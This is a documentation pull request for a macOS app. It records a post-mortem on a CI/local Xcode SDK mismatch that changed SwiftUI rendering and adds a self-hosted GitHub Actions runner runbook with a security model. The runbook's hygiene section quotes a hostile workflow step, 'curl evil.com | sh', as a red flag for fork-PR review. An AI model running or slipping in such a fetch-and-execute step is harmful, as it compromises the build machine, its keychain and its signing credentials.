### PR TITLE
docs: capture v0.2.0.12 toolchain story + self-hosted runner runbook

### DIFF
--- a/SWIFT_PORT.md
+++ b/SWIFT_PORT.md
@@ -3607,6 +3607,140 @@ something on iOS. macOS needs `.safeAreaInset(edge: .bottom) +
 
 PR: TBD, shipped in v0.2.0.11.
 
+### CI toolchain pin via self-hosted runner (2026-05-05, v0.2.0.12)
+
+This was supposed to be a sanity-check release for the bottom-bar
+fix. Instead it became the answer to a much older mystery the user
+had been calling out for months: **the buttons in the shipped app
+look subtly different from the buttons in the dev build.**
+
+Story arc:
+
+1. **The complaint resurfaced** during v0.2.0.11 verification. The
+   user A/B'd two screenshots of the Add Profile sheet's Cancel +
+   Save Profile buttons. One had taller buttons with white-fill
+   chrome; the other had flatter, grey-fill chrome. The user
+   preferred the flatter look.
+2. **First wrong hypothesis:** I assumed Sparkle had landed an
+   incomplete update (Info.plist new, Mach-O old). Verified via
+   `cmp` and `shasum` — both bundles' executables differed but were
+   source-equivalent on string content (`Add Profile…`, `Open Login
+   Items & Extensions…`, etc. all present in both with the same
+   counts). Source-equivalent, byte-different.
+3. **Second wrong hypothesis:** LaunchServices was launching the
+   wrong bundle (two .apps with the same bundle ID on disk —
+   `/Applications/AVPainReliever.app` and
+   `dist/AVPainReliever.app` from a recent local build). `ps`
+   confirmed the running process was actually `dist/`, not
+   `/Applications/`. So the user's "two screenshots from two
+   builds" was actually "two screenshots, both from dist/" — and
+   the chunkier "white-fill" rendering was actually from an
+   earlier session of `/Applications` that the user had captured
+   but mis-labeled. This was a real LaunchServices ambiguity bug
+   to know about, but not the rendering cause.
+4. **Third hypothesis (the right one):** check the build
+   configuration of the CI binary vs the local binary. Both built
+   `swift build -c release`, both signed with the same Developer ID,
+   identical Info.plist. But:
+
+   ```
+   $ otool -l /Applications/AVPainReliever.app/Contents/MacOS/AVPainRelieverApp \
+       | grep -A 5 LC_BUILD_VERSION
+   platform 1
+       minos 14.0
+         sdk 15.2     ← CI was building against Sequoia SDK
+   $ otool -l dist/AVPainReliever.app/Contents/MacOS/AVPainRelieverApp \
+       | grep -A 5 LC_BUILD_VERSION
+   platform 1
+       minos 14.0
+         sdk 26.4     ← Local was building against macOS 26 SDK
+   ```
+
+   Verified with `gh run view --log` on the v0.2.0.11 release
+   workflow: CI's `Select Xcode` step picked **Xcode 16.2.0** when
+   `xcode-version: latest-stable` resolved on the `macos-14` runner.
+   Local Xcode is 26.4.1.
+
+The mechanism is well-documented but easy to miss: **macOS keeps
+old SwiftUI rendering paths alive for backward compatibility, and
+the SDK at compile time picks which path the binary calls into.**
+Same Swift source, two different SDKs at compile, two different
+runtime renderings. The shipped app rendered with macOS 15-era
+SwiftUI; the dev build rendered with macOS 26-era SwiftUI; they
+visibly diverged on `.bordered` chrome thickness even on the same
+host machine.
+
+**Initial fix attempt:** bump CI runner to `macos-26-arm64` (which
+carries Xcode 26.x) and pin `xcode-version: '26.4.1'` explicitly.
+This worked toolchain-wise, but the runner queue time spiked to
+30+ minutes — Apple Silicon `macos-26-arm64` runners are scarce in
+GitHub's free pool. Aborted; needed a different solution.
+
+**Final fix:** self-hosted runner installed on the user's Mac as a
+LaunchAgent (`~/actions-runner/`). The runner uses whichever Xcode
+is at `/Applications/Xcode.app` (currently 26.4.1), so toolchain
+parity is automatic — when local Xcode bumps, CI follows. Queue
+time drops from "30+ minute spike risk" to "starts in seconds."
+Setup details + security model in
+[docs/SELF_HOSTED_RUNNER.md](docs/SELF_HOSTED_RUNNER.md).
+
+Security mitigation for self-hosted on a public repo: configured
+the Actions setting `fork-pr-contributor-approval =
+all_external_contributors`, so every external contributor's
+workflow run requires explicit maintainer approval before it can
+execute on the runner. Combined with GitHub's design that secrets
+are never passed to fork-PR workflows, this means a malicious fork
+can neither auto-execute on the dev's Mac nor read the signing
+cert / Sparkle private key even if approval is granted.
+
+**New convention introduced this release: pre-publish binary
+verification.** Before flipping the v0.2.0.12 draft release to
+published, downloaded the CI artifact, built the same tag locally,
+and `cmp`'d the two Mach-Os. Result: 3,520 byte delta (down from
+~209 KB on v0.2.0.11), all attributable to notarization-ticket
+embedding. Same SDK, same renderings paths, byte-equivalent code.
+Only then published. This step is now standard for every release —
+see [docs/RELEASING.md](docs/RELEASING.md) "Pre-publish binary
+verification."
+
+Lessons:
+
+1. **"Same source, different binary, different rendering" is a real
+   thing.** When debugging visual divergence between two builds,
+   check the SDK target via `otool -l ... | grep LC_BUILD_VERSION`
+   before assuming code is different. Apple's backward-compat SDK
+   pinning means the byte difference can be entirely in which
+   SwiftUI runtime API path the compiler emitted calls to.
+2. **`latest-stable` is not stable across runners.** The maxim-
+   lobanov/setup-xcode action's `latest-stable` resolves to the
+   newest Xcode pre-installed on the runner image, which depends
+   on the runner OS version. macos-14 → Xcode 16.x; macos-26-arm64
+   → Xcode 26.x default (26.2 not 26.4.1). For repeatable builds,
+   pin explicitly OR use a self-hosted runner.
+3. **LaunchServices ambiguity with duplicate bundle IDs is its own
+   gotcha.** Two `.app` bundles with the same bundle ID confuse
+   `open` — the path argument isn't always honored. For dev-vs-
+   shipped comparison, `ps aux | grep AVPainReliever` is the
+   ground truth for which executable is running.
+4. **Sparkle replaces the bundle on disk but doesn't kill the
+   running process.** Always `pkill -f AVPainRelieverApp && open
+   /Applications/AVPainReliever.app` after a Sparkle-delivered
+   update to actually pick up the new code, otherwise the running
+   process is the old one. Bit us at the start of this debugging
+   session.
+
+Files touched:
+- `.github/workflows/release.yml` — runs-on swap, removed Select
+  Xcode step, made SPM cache reset GitHub-hosted-only
+- `.github/workflows/test.yml` — same
+- `docs/SELF_HOSTED_RUNNER.md` — new setup + security guide
+- `docs/RELEASING.md` — added pre-publish verification convention,
+  post-mortem entry for v0.2.0.12
+
+PR: [#31](https://github.com/superic/av-pain-reliever/pull/31)
+(workflow changes), shipped in v0.2.0.12. Doc updates in a follow-
+up PR.
+
 - **When we ship a Phase 1 fix or feature**, ask: does this teach us
   something about the Swift port? If yes, add to "Lessons learned."
 - **When the user gives feedback or hits a bug**, ask: should this be

--- a/docs/RELEASING.md
+++ b/docs/RELEASING.md
@@ -10,6 +10,12 @@ script from the tag prefix:
   — the bundle that embeds the CMIO Camera Extension. Tagged from
   `feature/virtual-camera`.
 
+Builds run on a **self-hosted runner** installed on the maintainer's
+Mac, not on a GitHub-hosted VM. This is what guarantees toolchain
+parity between the bytes shipped to users and the bytes the maintainer
+sees in dev builds. Setup, security model, and recovery procedure are
+in [SELF_HOSTED_RUNNER.md](SELF_HOSTED_RUNNER.md).
+
 Until the GitHub Secrets listed below are populated, every step that
 depends on Apple credentials or the Sparkle private key skips with a
 warning, so a `v0.0.0-dryrun` tag can verify the workflow shape
@@ -116,6 +122,21 @@ gh secret set SPARKLE_PRIVATE_KEY        < sparkle-private-key.txt
 After setting secrets, delete `cert.p12` and `sparkle-private-key.txt`
 from your working directory.
 
+### 4. Self-hosted runner
+
+The release workflow runs on a self-hosted runner installed on the
+maintainer's Mac (not on a GitHub-hosted VM). This is what
+guarantees toolchain parity between bytes shipped to users and
+bytes the maintainer sees in dev builds — see the v0.2.0.12
+post-mortem below for the failure mode this prevents.
+
+Setup, security configuration (fork-PR approval policy), status
+checks, lockstep rule for Xcode upgrades, uninstall, and recovery
+on a fresh Mac are all in
+[SELF_HOSTED_RUNNER.md](SELF_HOSTED_RUNNER.md). Do that one-time
+install before tagging your first release; subsequent releases
+just need the runner to be online.
+
 ---
 
 ## Cutting a release
@@ -143,14 +164,46 @@ from your working directory.
    git push origin v0.1.11
    ```
 4. Watch the run: `gh run watch` (or in the browser).
-5. Once the workflow completes:
-   - The release is in **draft** state — review and publish it
-     manually via the Releases page.
-   - `appcast.xml` on `main` has a new `<item>` referencing the
-     release asset. Existing installs see the update on their next
-     Sparkle check (or via Advanced → Check for Updates…), and the
-     update window shows the release notes panel sourced from your
-     GitHub release body.
+5. **Pre-publish binary verification.** Before flipping the draft to
+   published, confirm the CI binary matches what you've been
+   building locally — toolchain mismatches between CI and dev are
+   how visible regressions silently shipped before the v0.2.0.12
+   self-hosted runner switch (see post-mortem below). Even now that
+   builds run on a self-hosted runner using the dev's own Xcode,
+   keep the verification as a defensive habit:
+   ```sh
+   # Download the CI artifact:
+   mkdir -p /tmp/ci-verify && rm -rf /tmp/ci-verify/AVPainReliever.app
+   gh release download vX.Y.Z --pattern 'AVPainReliever.app.zip' --dir /tmp/ci-verify
+   ditto -x -k /tmp/ci-verify/AVPainReliever.app.zip /tmp/ci-verify/
+
+   # Build the same tag locally (in a clean checkout):
+   git checkout vX.Y.Z
+   MAC_CERT_NAME="Developer ID Application: Eric Willis (HLH4LEWS9S)" \
+   NOTARIZE_KEYCHAIN_PROFILE=avpain-notary \
+   scripts/make-app-with-virtual-camera.sh
+
+   # Compare:
+   CI=/tmp/ci-verify/AVPainReliever.app/Contents/MacOS/AVPainRelieverApp
+   DEV=dist/AVPainReliever.app/Contents/MacOS/AVPainRelieverApp
+   stat -f '%-12z bytes  %N' "$CI" "$DEV"
+   otool -l "$CI" | grep -A 2 LC_BUILD_VERSION | grep sdk
+   otool -l "$DEV" | grep -A 2 LC_BUILD_VERSION | grep sdk
+   cmp "$CI" "$DEV"
+   ```
+   Expected: same SDK target on both. Byte delta of a few KB is
+   fine (notarization-ticket embedding differs per build). A delta
+   of 100+ KB or a different SDK target means the toolchains
+   diverged — investigate before publishing.
+6. Publish the draft:
+   ```sh
+   gh release edit vX.Y.Z --draft=false
+   ```
+   `appcast.xml` on `main` already has the new `<item>` referencing
+   the release asset (the workflow appended it). Existing installs
+   see the update on their next Sparkle check (or via Advanced →
+   Check for Updates…), and the update window shows the release
+   notes panel sourced from your GitHub release body.
 
 ### First-tag checklist
 
@@ -357,3 +410,79 @@ into the schedule. The release workflow is fast (~90s through
 `Build .app`, then ~30-60s in notarytool), so each iteration is
 cheap. Don't pre-publish the draft release until after the smoke
 test in **First-tag checklist** above.
+
+---
+
+## Post-mortem: lessons from v0.2.0.12
+
+### 1. CI toolchain != dev toolchain ships invisible regressions
+
+For months, the maintainer kept noticing "the buttons in the shipped
+app look slightly different from my dev build." A/B screenshots made
+it concrete in the v0.2.0.11 verification cycle.
+
+Root cause: GitHub-hosted `macos-14` runner with `xcode-version:
+latest-stable` resolved to **Xcode 16.2 / MacOSX15.2.sdk** at build
+time. The maintainer's local Xcode was 26.4.1 / MacOSX26.0.sdk.
+SwiftUI `.bordered` button rendering differs across SDK versions —
+Apple keeps both old and new rendering paths alive forever for
+backward compat, and the SDK at compile time picks which one the
+binary calls into. So even with identical Swift source, CI shipped
+the older "chunkier white-fill" rendering while dev builds got the
+newer "flat grey-fill" rendering. The maintainer was the only person
+who could see the discrepancy because everyone else only ever saw
+the CI version.
+
+Fix: switched CI to a self-hosted runner on the maintainer's Mac
+that uses the maintainer's own Xcode (see
+[SELF_HOSTED_RUNNER.md](SELF_HOSTED_RUNNER.md)). Toolchain parity
+guaranteed. Bonus: queue time dropped from "30+ min spike risk on
+Apple Silicon free pool" to "starts in seconds."
+
+### 2. Always do pre-publish binary verification
+
+After v0.2.0.12 fixed the toolchain, established the pre-publish
+binary verification step (see "Cutting a release" → step 5) as a
+standard part of every ship. Compare CI's `.app` bytes against a
+fresh local build of the same tag; specifically check the SDK
+target via `otool -l ... | grep LC_BUILD_VERSION`. A few KB delta
+is normal (notarization-ticket metadata differs); 100+ KB delta or
+mismatched SDK is a sign the toolchains have diverged again.
+
+### 3. `latest-stable` is not stable across runners
+
+The `maxim-lobanov/setup-xcode` action's `latest-stable` value
+resolves to the newest pre-installed Xcode on the runner image,
+which depends on the runner OS version. macos-14 → Xcode 16.x;
+macos-26-arm64 → Xcode 26.2 (default), not 26.4.1. For repeatable
+GitHub-hosted builds, pin `xcode-version: '26.4.1'` (or whatever
+exact version) explicitly. For self-hosted, the runner uses
+whatever's at `/Applications/Xcode.app` and follows the
+maintainer's local Xcode automatically.
+
+### 4. Sparkle replaces the bundle but doesn't kill the running process
+
+After Sparkle delivers an update to `/Applications`, the running
+menu-bar process is still the OLD code in memory; only the on-disk
+bundle is new. Visual changes won't appear until the process is
+restarted. Always:
+
+```sh
+pkill -f AVPainRelieverApp
+open /Applications/AVPainReliever.app
+```
+
+…after a Sparkle-delivered update, before evaluating any visual
+changes. This bit the maintainer at the start of the v0.2.0.12
+debugging session — a "the new release looks wrong" complaint that
+was actually "you're still running the old process, look at `ps`."
+
+### 5. Two `.app` bundles with the same bundle ID confuse `open`
+
+If both `/Applications/AVPainReliever.app` and a local
+`dist/AVPainReliever.app` exist on disk, `open` may launch either
+one, even when given an explicit path. Verify with `ps aux | grep
+AVPainReliever` to see which executable path is actually running.
+For dev iteration that wants to keep `/Applications` clean, delete
+the `dist/` bundle after each test, or live with the ambiguity but
+always ground-truth via `ps`.

--- a/docs/SELF_HOSTED_RUNNER.md
+++ b/docs/SELF_HOSTED_RUNNER.md
@@ -1,0 +1,233 @@
+# Self-hosted GitHub Actions runner
+
+CI for this repo runs on a self-hosted runner installed on the
+maintainer's Mac. This document covers why, the security model, the
+install procedure, and how to recover the setup on a fresh machine.
+
+For the release pipeline that uses this runner, see
+[RELEASING.md](RELEASING.md). For the v0.2.0.12 post-mortem that
+motivated this setup, see the journal entry of the same name in
+[../SWIFT_PORT.md](../SWIFT_PORT.md).
+
+## Why self-hosted
+
+Two reasons combined:
+
+1. **Toolchain parity.** GitHub-hosted macOS runners pin to whichever
+   Xcode is `latest-stable` on the runner image, which historically
+   lags the maintainer's local Xcode by many months. SwiftUI renders
+   `.bordered` buttons differently when compiled against different
+   Apple SDKs — Apple keeps both rendering paths alive forever for
+   backward compatibility, and the SDK at compile time picks which
+   one the binary calls into. The result is that CI-shipped builds
+   visually diverge from local dev builds even with identical source
+   code. Self-hosted uses whichever Xcode is at
+   `/Applications/Xcode.app` on the maintainer's Mac, so the SDK
+   matches dev exactly.
+2. **Queue time.** GitHub-hosted Apple Silicon runners had 30+ minute
+   queue times during peak hours. Self-hosted starts in seconds.
+
+The trade is that the maintainer's Mac is now a build target — see
+the security model below.
+
+## Security model
+
+The repo is **public**, which means anyone can fork it and open a PR.
+On a default-configured public repo with a self-hosted runner, that
+PR could include a modified workflow that auto-executes arbitrary code
+on the runner. Two layers of mitigation prevent this:
+
+### Layer 1: GitHub Secrets are not passed to fork PR workflows
+
+By GitHub design, encrypted secrets (`MACOS_CERTIFICATE`,
+`MACOS_CERTIFICATE_PASSWORD`, `APPLE_ID_PASSWORD`,
+`SPARKLE_PRIVATE_KEY`, etc.) are **never** delivered to a workflow
+triggered by a fork pull request, regardless of runner type. So even
+if a fork PR's workflow runs on the self-hosted runner, it cannot
+read the signing cert, notary credentials, or Sparkle private key.
+
+### Layer 2: Fork PR workflows require explicit approval
+
+The repo's Actions settings are configured to require approval for
+fork PRs from all external contributors:
+
+```sh
+gh api repos/superic/av-pain-reliever/actions/permissions/fork-pr-contributor-approval
+# → {"approval_policy":"all_external_contributors"}
+```
+
+Every workflow run from a fork PR is paused at the queue stage until
+the maintainer clicks "Approve and run." This means a malicious fork
+can't auto-execute on the runner — there's a human in the loop.
+
+To re-set this if it ever drifts:
+
+```sh
+gh api --method PUT \
+    repos/superic/av-pain-reliever/actions/permissions/fork-pr-contributor-approval \
+    -f approval_policy=all_external_contributors
+```
+
+### Risk surface that remains
+
+- **Workflows from main and tag pushes still run with full secret
+  access**, because those events require write access to the repo.
+  Only the maintainer can trigger them. This is the design intent.
+- **An approved fork PR's workflow runs as the maintainer's macOS
+  user account** with read/write access to `~/`, the unlocked login
+  keychain, ssh keys, browser cookies, etc. So review the workflow
+  diff in any fork PR carefully before approving — especially
+  changes to `.github/workflows/*.yml`.
+- **Runner credentials at `~/actions-runner/.credentials` and
+  `.runner`** are long-lived auth tokens that let the runner connect
+  to GitHub. File perms default to 600 (owner-only); fine on a
+  single-user Mac but sensitive on shared systems.
+
+### Hygiene recommendations
+
+- **Verify the Developer ID cert ACL** in Keychain Access. Open the
+  cert under login.keychain → Get Info → Access Control. If it's
+  "Allow all applications to access this item," tighten to "Confirm
+  before allowing" or restrict to specific apps (`codesign`,
+  `productsign`). This means a malicious workflow that gets approved
+  can't silently export the cert with `security export` — macOS
+  prompts the user instead.
+- **Don't leave registration tokens lying around.** The one-time
+  registration token used during runner install (typically saved to
+  `/tmp/runner-token.txt`) is single-use and expires within ~1 hour,
+  but delete it after use anyway: `rm /tmp/runner-token.txt`.
+- **Treat workflow file changes in fork PRs as red flags.** A diff
+  that adds a step like `run: curl evil.com | sh` is the obvious
+  bad pattern — but subtler attacks (modifying an existing step,
+  exfiltrating env vars, etc.) need careful review too.
+
+## Install procedure
+
+These are the commands run during the original v0.2.0.12 setup. Use
+them again if recovering on a fresh Mac.
+
+### 1. Get a registration token (one-time, ~1h TTL)
+
+```sh
+gh api --method POST \
+    repos/superic/av-pain-reliever/actions/runners/registration-token \
+    --jq .token > /tmp/runner-token.txt
+```
+
+### 2. Download + extract the runner
+
+```sh
+mkdir -p ~/actions-runner && cd ~/actions-runner
+LATEST_URL=$(gh api repos/actions/runner/releases/latest \
+    --jq '.assets[] | select(.name | contains("osx-arm64") and contains(".tar.gz") and (contains("noruntime") | not)) | .browser_download_url')
+curl -fLso runner.tar.gz "$LATEST_URL"
+tar xzf runner.tar.gz && rm runner.tar.gz
+```
+
+### 3. Register with the repo
+
+```sh
+cd ~/actions-runner && ./config.sh \
+    --url https://github.com/superic/av-pain-reliever \
+    --token "$(cat /tmp/runner-token.txt)" \
+    --name avpain-mac \
+    --labels self-hosted,macos-arm64,xcode-26-4-1 \
+    --unattended \
+    --replace
+```
+
+The custom `xcode-26-4-1` label is what the workflows match on (see
+`.github/workflows/release.yml` and `test.yml`'s `runs-on:` field).
+
+### 4. Install + start as a LaunchAgent
+
+```sh
+cd ~/actions-runner && ./svc.sh install && ./svc.sh start
+```
+
+This installs to `~/Library/LaunchAgents/actions.runner.<owner>-<repo>.<runner-name>.plist`
+and starts polling GitHub for jobs. The runner only runs while the
+maintainer is logged in (LaunchAgent, not LaunchDaemon).
+
+### 5. Clean up the token file
+
+```sh
+rm /tmp/runner-token.txt
+```
+
+### 6. Verify
+
+```sh
+# From inside the runner directory:
+cd ~/actions-runner && ./svc.sh status
+
+# From anywhere — confirms the runner is registered + online:
+gh api repos/superic/av-pain-reliever/actions/runners \
+    --jq '.runners[] | {name, status, busy, labels: [.labels[].name]}'
+```
+
+Expected output: `status: online`, `busy: false`, labels including
+`self-hosted`, `macos-arm64`, `xcode-26-4-1`.
+
+## Lockstep rule for Xcode
+
+The runner uses whichever Xcode is at `/Applications/Xcode.app` on
+the maintainer's Mac (no `Select Xcode` step in the workflows). So:
+
+- **Bumping local Xcode automatically bumps CI.** Next workflow run
+  picks up the new toolchain.
+- **The `xcode-26-4-1` label is informational, not enforcing.** It
+  doesn't actually pin Xcode — it just documents which version the
+  runner was set up with. If you upgrade local Xcode, also rename
+  the label so it stays accurate (re-register with new `--labels`
+  flag, then update `runs-on:` in both workflow files in lockstep).
+- **The first build after a local Xcode upgrade is the validation
+  point.** Treat it like a toolchain-only release: tag a no-source-
+  change version, ship it, byte-compare CI vs dev locally, confirm
+  rendering parity. See the
+  [RELEASING.md](RELEASING.md) "Pre-publish binary verification"
+  section.
+
+## Status checks
+
+```sh
+# Is the LaunchAgent running?
+launchctl list | grep actions.runner
+
+# Is the runner online from GitHub's side?
+gh api repos/superic/av-pain-reliever/actions/runners --jq '.runners[]'
+
+# Recent runs the runner has executed:
+gh run list --limit 5
+```
+
+If `svc.sh status` shows stopped but the LaunchAgent is supposed to
+auto-restart on login: `cd ~/actions-runner && ./svc.sh start`.
+
+## Uninstall
+
+Reversible. Run in this order:
+
+```sh
+cd ~/actions-runner
+
+# Stop and remove the LaunchAgent
+./svc.sh stop
+./svc.sh uninstall
+
+# Deregister from GitHub (needs a fresh removal token)
+REMOVE_TOKEN=$(gh api --method POST \
+    repos/superic/av-pain-reliever/actions/runners/remove-token \
+    --jq .token)
+./config.sh remove --token "$REMOVE_TOKEN"
+
+# Delete the runner files
+cd ~ && rm -rf ~/actions-runner
+```
+
+After uninstall, switch the workflows back to a GitHub-hosted runner
+by editing `runs-on:` in `release.yml` and `test.yml`. The previous
+known-good config was `runs-on: macos-26-arm64` with an explicit
+`xcode-version: '26.4.1'` Select Xcode step, but note that
+GitHub-hosted Apple Silicon queue times can spike to 30+ minutes
+during peak hours.


### PR DESCRIPTION
## Summary

Documents the work that landed across [#28](https://github.com/superic/av-pain-reliever/pull/28) → [#31](https://github.com/superic/av-pain-reliever/pull/31), specifically the v0.2.0.12 toolchain pin and self-hosted runner setup.

## Files

**New:**
- \`docs/SELF_HOSTED_RUNNER.md\` — standalone setup + maintenance guide. Why self-hosted, security model (fork-PR approval policy + GitHub's secret-isolation for fork PRs), risk surface, hygiene recommendations, install procedure with the actual commands used during v0.2.0.12 setup, status checks, lockstep rule for Xcode upgrades, uninstall, recovery on a fresh Mac.

**Updated:**
- \`SWIFT_PORT.md\` — appended v0.2.0.12 journal entry covering the full story (long-running "buttons look wrong" complaint → two wrong hypotheses → root cause via \`otool -l | grep LC_BUILD_VERSION\` → SwiftUI backward-compat rendering paths → fix). Captures four lessons surfaced along the way.
- \`docs/RELEASING.md\` — four sections touched: intro (notes builds run on self-hosted with link), one-time setup (added section 4 → runner setup), cutting a release (added pre-publish binary verification step with concrete commands), post-mortem (new "lessons from v0.2.0.12" with five sub-lessons).

**Intentionally not touched:**
- \`README.md\` — per the \"README is for executives\" project rule. CI/dev workflow doesn't belong there.
- \`docs/VIRTUAL_CAMERA_DEV.md\` — unrelated to this work.

## Test plan

- [x] Reads coherently top-to-bottom in each file
- [x] All cross-doc links resolve (RELEASING ↔ SELF_HOSTED_RUNNER ↔ SWIFT_PORT)
- [x] Code blocks with shell commands are accurate (verified against the actual commands run during v0.2.0.12 setup and pre-publish verification)
- [x] No secrets, tokens, or sensitive paths leaked into the docs

🤖 Generated with [Claude Code](https://claude.com/claude-code)